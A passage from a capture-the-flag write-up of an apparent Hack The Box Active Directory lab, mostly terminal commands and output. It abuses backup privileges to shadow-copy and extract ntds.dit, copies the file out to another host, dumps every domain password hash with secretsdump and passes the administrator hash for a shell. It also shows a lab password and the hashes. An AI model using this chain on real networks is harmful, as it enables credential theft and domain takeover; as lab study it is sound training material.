bsic enumeration -
*Evil-WinRM* PS C:\Users\backup-svc\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
To exploit this i followed
https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/
Transfering a file via evil-winrm was a pain ..
I started a share on citrix, and accessed it from dc as dc was not able to reach my kali machine directly.
C:\ProgramData> net share df=c:\programdata /grant:everyone,FULL
net share df=c:\programdata /grant:everyone,FULL
df was shared successfully.
One DC
*Evil-WinRM* PS C:\Users\backup-svc\Documents> net use \\172.16.249.205\df /user:htb\mturner 4install!
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.249.200:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.249.200:5985 ... OK
The command completed successfully.
I need to get the ntds.dit file but i cannot directly access it because when the machine is on we generally cannot copy it.
*Evil-WinRM* PS C:\Users\backup-svc\Documents> diskshadow /s hello.dsh
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC, 1/22/2024 10:04:23 AM
-> set context persistent nowriters
-> add volume c: alias hello
-> create
Alias hello for shadow ID {e541b08e-5a9b-4212-b92b-fc68ed009e78} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {1d5592fd-faa1-43d9-9d34-0f8a8e4d83a3} set as environment variable.
Querying all shadow copies with the shadow copy set ID {1d5592fd-faa1-43d9-9d34-0f8a8e4d83a3}
* Shadow copy ID = {e541b08e-5a9b-4212-b92b-fc68ed009e78} %hello%
- Shadow copy set: {1d5592fd-faa1-43d9-9d34-0f8a8e4d83a3} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{78d1dcbd-51bd-4ccf-907c-aa32152ad3f2}\ [C:\]
- Creation time: 1/22/2024 10:04:23 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC.htb.local
- Service machine: DC.htb.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %hello% z:
-> %hello% = {e541b08e-5a9b-4212-b92b-fc68ed009e78}
The shadow copy was successfully exposed as z:\.
reg save hklm\system system
*Evil-WinRM* PS C:\Users\backup-svc\Documents> robocopy /b z:\windows\ntds . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Monday, January 22, 2024 10:04:49 AM
Source : z:\windows\ntds\
Dest : C:\Users\backup-svc\Documents\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 z:\windows\ntds\
New File 16.0 m ntds.dit
0.0%
0.3%
100%
Copied system and ntds to citrix.
copy ntds.dit \\172.16.249.205\df\ntds.dit
copy system \\172.16.249.205\df\system
meterpreter > download system
[*] Downloading: system -> /home/nakul/Desktop/ctf/htb-EndGames/Xen/system
[*] Downloaded 1.00 MiB of 12.75 MiB (7.84%): system -> /home/nakul/Desktop/ctf/htb-EndGames/Xen/system
[*] Downloaded 2.00 MiB of 12.75 MiB (15.68%): system -> /home/nakul/Desktop/ctf/htb-EndGames/Xen/system
[*] Downloaded 3.00 MiB of 12.75 MiB (23.52%): system -> /home/nakul/D
Dumped the hashes.
➜ Xen impacket-secretsdump -ntds ntds.dit -system system LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x6e398137ec7f2e204671dad7c778509f
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 4a62a0ac1475b54add921ac8c1b72e31
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:5e507509602e1b651759527b87b6c347:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3791ca8d70c9e1d2d2c7c5b5c7c253e8:::
CITRIX$:1103:aad3b435b51404eeaad3b435b51404ee:fd981d0c915932bb3ddf38b415c49121:::
htb.local\alarsson:1104:aad3b435b51404eeaad3b435b51404ee:92a44f1aa6259c55f9f514fabae5cc3f:::
htb.local\jmendes:1106:aad3b435b51404eeaad3b435b51404ee:10d0c05f7d958955f0eaf1479b5124a0:::
htb.local\pmorgan:1107:aad3b435b51404eeaad3b435b51404ee:8618ba932416a7404a854b250bf28577:::
htb.local\awardel:1108:aad3b435b51404eeaad3b435b51404ee:270e4d446437f4383b092b42a9f88f0a:::
Root ->
➜ Xen proxychains impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be administrator@172.16.249.200
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.249.200:445 ... OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.249.200:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:9050 ... 172.16.249.200:49666 ... OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
htb\administrator
C:\>type C:\users\administrator\Desktop\flag.txt
XEN{d3r1v471v3...1n_4dm1n}
Finally.